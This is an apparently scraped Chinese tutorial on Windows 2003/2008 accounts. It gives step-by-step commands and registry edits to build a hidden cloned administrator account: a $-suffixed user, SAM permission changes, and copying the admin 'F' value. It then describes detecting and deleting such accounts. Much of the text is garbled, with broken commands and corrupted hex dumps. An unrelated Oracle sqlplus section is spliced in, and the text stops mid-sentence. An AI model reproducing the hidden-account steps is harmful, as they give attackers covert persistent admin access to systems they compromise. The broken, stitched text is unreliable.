账户win下建立隐藏系统用户与查看及删除方法

w i n2003 008下建立隐藏系统用户与查看及删除方法wndows系统很好用使用的人很多很多但也超容易中毒下面我来给大家讲win2003/20 下建立隐藏系统用户与查看及删除方法希望对大家所有帮助。 建立隐藏系统用户

先做准备工作,新建一个用户名为sxitn 加上$符号使用命令ne  user将查看不到用户 ,密码为23:

 t u er s  t  123456 /add

然后把sxitn$加入管理组net loclgroup administ ato  sxit  /ad

然后开始—t&g 运行输入reget3 。 exe找到HKY_LOCAL_AHIE下的AM项下的SAM点击右键-权限,在安全选项卡中添加用户组dmini  t aor或者当前用户,允许完全控制应用确定后关闭。

开始-&gt运行输入 gei t打注册表。找到HEY_LCALHINE—SAM-SAM—omins-liases—Use

 s—aes—sitn 记住右边的值的类型—>×3ef,然后导出,命名为xit .re 在Use  s项中找到3f项也同样导出,命名为3e  .r   1 f4 admnis  ratr默认

的项)项也导出,命名为1f4。 reg.

用记事本打开1f4。  g,复制:

F"e:02 0  0 ,00,0,0,00,00,d  6,92 e05,df c7 1  00,00,00,0  00 0,0,/

00 0 1c,   8 94,2,c7,1  0,0,00 0,00

00 00,0   ,51  1   cb,08,f    01  /f4,01  0 00 01  0,0 00 0,2,00,00 00,0,0000,1,0 c  00,01  00 0  00 00 /

00,0 00 0    00, 

用记事本打开3f。 reg把刚才复制的粘贴到相应的位置。用记事本打开sxit .re复制:

HKEYLOCAL_MACHNSMSAMDomains/ccoun /UsrsNames/x n

@=hex(3e   :

粘贴到3ef。 re最后的位置。最后3ef。 r 为

Wi  s egis  y Edi orersio 5.0

HKOCA_MAIE/S/AM/omains/Account/Users/00003EF]

"F” hex:02 0,01  00,0,0 0,0 0,00 00 0  00,00,0,0 00 00,00 00,0,0  00 /

00,0,97 d 19,1 ,df c7 01  0  00 00,00 00 00

00 00,0  00,0, ,00,00 0,0,/ef   ,00 00 01  02 00 00,10,00 00, ,00,   

0 00 00 00 00,00 01,0,00 00 00

00 9 ,7c,4e,2e 20 7

”V” =hex 00 00 00,0 b  0 0 00,02 001  00 bc 0,00 00,0c 0, , ,0 00 00 /

0,c  00 00, ,00,00 0 0,0  00 0 0,8,00 00,00,0,00,00,00,00 00,0,00 /c  00 00,00, ,0,00,00 00 0  0  00 c8 0 

0  00,00 00 00,0,00,0 0  0,   /

00,00 0 0,0 00,0  0,00 00 00 c8 00,00,0,0,0 0  00,00,00 00 0 c8,00 /

0,00 0,00 00,0  00 00 00 00 c, ,0,000 00,00,0,00 0,0,00,c8,00,00,/

00 00 00 0,0 0  00,0  00, ,0,0,00 000,0,0,00  ,00 0 c8,00 00 0,/

0800000001, ,000 d0,000000 14 0,00,00,00,   00,0  e4,00 00 0 4,

00 0,00 00,0,00 0 f,0  00, ,0  00,0 

00 00,00 0,00,fc,0,0 0  04,00 /

00,00 00,0    00,0 ,00,14 0,9c,0,00  ,a 

00 00 00 14 0  00 00 4,00,0  /

00 02 0,0 00 02,00,00 00 02 c0,14,00 44 005 01,0 ,01  00 00 0,0 00,01,/

0,00,0  0,02 c0,14,00 ff,0  0  ,0,01  01  00,00, ,00,   05 07 00,00 00 02,/

0,58 00 03,00,00,0 00,00,2  00,44 0,02 00,0 ,050,00 0,00 0,05 15 0,/

0,00,5     10 a,37 d9 e9,d7,09    8b 28  ,3 00,00,00 0  ,0,ff,0,0f /

00 01  2,00 0 0 00 00 05 20,00 00 00,2 

02 0  00 00,00 1  00,5b 3 02,00 /

01  01,0,00,0  0   ,0 ,0,00 00 00 1,  00,00,0 00 00,05 0 0  0  00 20,

02 00 00 01,02,00 00 00,00 0,0 ,20,00 00 00,20,02,0   ,73 00,7,00,69,00 /

7,00 6e 0         ,02 00,   7 0,00 0   ,00,01  0  c5,3d 4  2 b,  6f /

1,57 d,4c c,e 20 76,3,1,00 1,   47ad,   5,3f ac 4a,a1  f6,d  c  9,/bc,1e 8  15,01,00,0  0  01,00,1,00

HKEY_LCL_AHINE/SAMSAMDmain/Account/U ers/Namesxitn]

=hex(3f) 

然后保存。删除用户sxitn$:net use  s  tn$/delet

之后运行3ef.reg导入注册表!打开regedt32.exe把SM安全选项卡中的 min straor删除然后应用.

这样隐藏用户就建立好了。

怎样查看账号创建时间

1、在你安装的时候有一个设置密码,那个密码是你的数据库管理员的密码一定要记住。

2、等数据库安装好之后启动oracle数据库服务后,用下面的命令就可以进入sqlp s在cd中输入qllus sys/密码s sysdba

3、进入数据库后用下面的命令建用户c  et sr user;

rnt  esur ,connect t u r_name;

4、现在sqlpus就可以进入了,在cmd中输入sqpl  u ernm/password查看WIN203服务器下是否加入了隐藏账户

修改注册表型隐藏账户

由于使用这种方法隐藏的账户是不会在“命令提示符"和“计算机管理"中看到的,因此可以到注册表中删除隐藏账户.来到“HKE_LCA_MAHNEAMAMDoaincountU ersames”把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可.

使用reged 打开注册表编辑器

找到HKY_LOL_MHIN——SA——M]-—[Dmains——[ccunt]——Users],这里下

面的数字和字母组合的子键是你计算机中所有用户帐户的SAM项.

子分支ames下是用户名,每个对应上面的SA项。查找隐藏的帐户就比较两个用户名的SAM值完全一样的就说明其中一个是克隆帐户。你可以在这里删除其用户名。一般推荐分别导出用户名项和对应的S AM然后找一个关键字分析比较。具体比较的方法多种多样自己看了。

目前有种系统级后门可以在有管理员帐户登入的时候自动删除这里的克隆帐户值等你退出了又自动恢复。遇到这种的情况这里是查不出来的。一般这种后门都是高手搞的,免杀。

遇到这种情况建议找专业安全人员处理。

另外本地安全策略——本地策略-—安全选项中可以查看默认管理员和贵宾帐户这里可以查出默认的ue  t是否被克隆了如果这个帐户被克隆这里会显示出真正的克隆后的用户名。

计算机管理中显示的依然是正常的用户,所以查那里是没什么意义的。另一种解决办法开始--运行cmd下

运行。 。   .。  。 net   al oup amin s  raors

看看那加了的就是隐藏的账户了1、右键单击“我的电脑”

→“管理"→“计算机管理"→“本地用户和组”→“用户”→看看有没有陌生用户

2、→看看有没有陌生用户

隐藏账户在上述中看不到的

3、 “开始"→“运行"→“cmd”→“ egedi  ”→找到注册表分支

“HKEYLOCAL_MCHIESAM/S/Domais

Acunt/sers/Nmes”→看看有没有克隆用户无法看到名称的隐藏账户

如果黑客制作了一个修改注册表型隐藏账户在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的甚至无法知道黑客建 立的隐藏账户名称.不过世事没有绝对,我们可以借助“组策略”的帮助让黑客无法通过隐藏账户登陆。点击“开始”→“运行”输入 “pdit.msc"运行“组策略” ,依次展开“计算机配置"→“Windo w设置”→“安全设置”→“本地策略”→“审核策略” ,双击右边的“审核策略更改”在弹出的设置窗口中勾选“成功”然后点“确定"。对“审核登陆事件” 和“审